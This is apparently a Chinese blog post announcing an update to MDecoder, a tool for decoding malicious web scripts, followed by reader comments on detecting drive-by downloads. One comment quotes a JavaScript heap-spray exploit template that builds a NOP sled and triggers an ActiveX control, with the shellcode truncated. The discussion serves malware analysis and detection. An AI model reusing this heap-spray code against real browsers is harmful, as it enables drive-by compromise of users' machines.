0.61更新:
1、解决上个版本调整带来的BUG。感谢250662772的反馈。
下载地址:
http://www.mtian.org/down/MDecoder.zip
http://log.mtian.org/MDecoder.zip
闲扯:这个版本的自动解密功能我已经挺满意了。不过附带一句,解密按钮那里的自动解密选项还是以前的流程跟自动解密分析流程内用的解密函数不一样。
0.61更新:
1、解决上个版本调整带来的BUG。感谢250662772的反馈。
下载地址:
http://www.mtian.org/down/MDecoder.zip
http://log.mtian.org/MDecoder.zip
闲扯:这个版本的自动解密功能我已经挺满意了。不过附带一句,解密按钮那里的自动解密选项还是以前的流程跟自动解密分析流程内用的解密函数不一样。
沙发 麦麦好勤劳
你好,请教个问题,如果加密串里依赖于dom对象内容,mdecoder能支持吗?
回楼上:除了hook开头的解密方法,都不依赖JS引擎,所以列出的解密方法都不受影响。但是其他有些地方要看具体的应用,可能受到一些影响。
看一段js:
var appllaa=’0′;
var nndx=’%’+’u9’+’0’+’9’+’0’+’%u’+’9’+’0’+’9’+appllaa;
var dashell=unescape(nndx+”%u9090%u909……”);
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
如果要进行自动解密的话,是不是先做词法分析,得出memory变量内容,然后再利用unescape等解密函数进行解密?解密后用正则来查询malware的url,是不是这样,能透露一下吗?谢谢!
对了,你用了v8引擎来执行,所以memory变量应该可以抽取到,不用自己的词法分析,我最近在搞挂马检测,所以对你的东西很感兴趣,请多指教!
只是要获取malware的url其实没那么复杂的,最简单的就是直接对shellcode解码,然后正则匹配URL就可以了。
Standalone JavaScript Engine对dom的支持都有问题
还不如用MSSCRIPT.OCX控件